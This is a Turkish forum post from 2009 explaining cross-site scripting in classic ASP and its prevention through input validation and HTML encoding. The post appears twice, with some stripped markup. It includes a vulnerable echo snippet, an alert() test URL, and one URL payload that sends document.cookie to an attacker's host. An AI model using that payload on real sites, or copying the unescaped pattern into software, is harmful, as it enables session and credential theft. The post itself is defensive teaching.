Çapraz site kod çalıştırma ve önlem alma yöntemleri :

**Constantine** · 05-14-2009, 10:54 AM

Çapraz site kod çalıştırma ve önlem alma yöntemleri :

Site çapında kodlama zaafları Web’e özgü sorunlardır ve istemcinin verilerinin tek bir Web sayfasındaki gedik nedeniyle bozulmasına neden olabilir. Aşağıdaki kod bölümüne bakın:

<script language=Jscript>
Response.Write("Hello

" + Request.QueryString("name"));
aaaaaaaaaaa

[bu kodu çalıştırdığınızda browser de name değişkenine karışılık gelen değer alınarak (mesela name = "ali" olsun ) ekranınıza "Hello Ali" yazdıracaktır.]

Kaçınız böyle bir kodu gördü? Bunun hatalı olduğunu öğrenmek sizi şaşırtabilir! Normal koşullarda

bir kullanıcı bu koda aşağıdakine benzeyen bir URL kullanarak ulaşabilir:

http://explorationair.com/welcome.asp?name=Michael

Oysa saldırganlar bu kodu kötü amaçla kullanarak HTML değerini ad olarak sunar. Aşağıdaki URL değerini yazdıysanız

http://northwindtraders.com/welcome.asp?name=aaaaaaaaaaalert('hi!');aaaaaaaaaa a

“merhaba” diyen bir iletişim kutusunun bulunduğu bir web sayfasını görüntülersiniz! “Yani?” dediğinizi duyar gibiyim. Saldırganın kullanıcıyı bunun gibi bir bağlantı hattını tıklamaya ikna ettiğini varsayalım

querystring içerdiği kötü amaçlı komutlar ve HTML ile cookie'lerinizi alır ve saldırganın sitesine yapıştırır; saldırgan artık özel cookie bilgilerine ve başka bilgilere sahiptir.

[ Mesela browser'a :
http://northwindtraders.com/welcome.asp?name=page.go("http://websitem/cookiekaydet.asp?data="+document.cookie) yazip kullanıcıya cookiedeki bilgileri (ki bunlar kullanıcı adı ve şifre olabilir) alabilirdik. ]

Bunu önlemek için iki yöntem kullanabilirsiniz: Birinci olarak

girdilere güvenmeyin ve kullanıcı adının sunumu konusunda katı olun. Örneğin

adın sadece ortak karakter alt kümesini içerdiğini ve aşırı büyük olmadığını denetleyen olağan ifadeler kullanabilirsiniz.

İkinci savunma ise

çıktı olarak kullanıldığında

tüm girdileri HTML-şifreli hale getirmektir. Bu yöntem tehlikeli HTML etiketlerini eler ve daha güvenilir kaçış karakterlerini geride bırakır. Sorun olabilecek dizilerden ASP.NET’te HttpServerUtility.HtmlEncode ile veya ASP’de Server.HTMLEncode ile kaçabilirsiniz.PHP de nasıl olduğunu PHP bilen arkadaşlarımız söylesinler

05-14-2009, 10:54 AM	#1 (permalink)
Constantine {♥_♥} sürgün..{♥_♥}	Çapraz site kod çalıştırma ve önlem alma yöntemleri : Çapraz site kod çalıştırma ve önlem alma yöntemleri : Site çapında kodlama zaafları Web’e özgü sorunlardır ve istemcinin verilerinin tek bir Web sayfasındaki gedik nedeniyle bozulmasına neden olabilir. Aşağıdaki kod bölümüne bakın: <script language=Jscript> Response.Write("Hello " + Request.QueryString("name")); aaaaaaaaaaa [bu kodu çalıştırdığınızda browser de name değişkenine karışılık gelen değer alınarak (mesela name = "ali" olsun ) ekranınıza "Hello Ali" yazdıracaktır.] Kaçınız böyle bir kodu gördü? Bunun hatalı olduğunu öğrenmek sizi şaşırtabilir! Normal koşullarda bir kullanıcı bu koda aşağıdakine benzeyen bir URL kullanarak ulaşabilir: http://explorationair.com/welcome.asp?name=Michael Oysa saldırganlar bu kodu kötü amaçla kullanarak HTML değerini ad olarak sunar. Aşağıdaki URL değerini yazdıysanız http://northwindtraders.com/welcome.asp?name=aaaaaaaaaaalert('hi!');aaaaaaaaaa a “merhaba” diyen bir iletişim kutusunun bulunduğu bir web sayfasını görüntülersiniz! “Yani?” dediğinizi duyar gibiyim. Saldırganın kullanıcıyı bunun gibi bir bağlantı hattını tıklamaya ikna ettiğini varsayalım querystring içerdiği kötü amaçlı komutlar ve HTML ile cookie'lerinizi alır ve saldırganın sitesine yapıştırır; saldırgan artık özel cookie bilgilerine ve başka bilgilere sahiptir. [ Mesela browser'a : http://northwindtraders.com/welcome.asp?name=page.go("http://websitem/cookiekaydet.asp?data="+document.cookie) yazip kullanıcıya cookiedeki bilgileri (ki bunlar kullanıcı adı ve şifre olabilir) alabilirdik. ] Bunu önlemek için iki yöntem kullanabilirsiniz: Birinci olarak girdilere güvenmeyin ve kullanıcı adının sunumu konusunda katı olun. Örneğin adın sadece ortak karakter alt kümesini içerdiğini ve aşırı büyük olmadığını denetleyen olağan ifadeler kullanabilirsiniz. İkinci savunma ise çıktı olarak kullanıldığında tüm girdileri HTML-şifreli hale getirmektir. Bu yöntem tehlikeli HTML etiketlerini eler ve daha güvenilir kaçış karakterlerini geride bırakır. Sorun olabilecek dizilerden ASP.NET’te HttpServerUtility.HtmlEncode ile veya ASP’de Server.HTMLEncode ile kaçabilirsiniz.PHP de nasıl olduğunu PHP bilen arkadaşlarımız söylesinler

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder
Stil
Normal Hybrid-Şeklinde gösterime geç Ağaç şeklinde gösterime geç

Benzer Konular
Konu	Konuyu Başlatan	UslanmaM	Cevaplar	Son Mesaj
Web Uygulamalarında Çapraz Kod Çalıştırma (Cross Site Scripting)	Constantine	ASP, Perl, Php, Html	0	05-14-2009 10:51 AM
Alerjiye karşı rahat nefes alma yöntemleri	Constantine	Sağlık Haberleri	0	03-17-2009 03:56 PM
Yakalama,Gözaltına Alma ve İfade Alma Yönetmeliği	KIZIL	Hukuk	0	05-20-2008 11:46 AM
slm ben onur site açıcam site açmak için biri gelsin beraber açalımm	pirlo	UslanmaM FaN ClupS	2	04-29-2008 08:28 PM

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)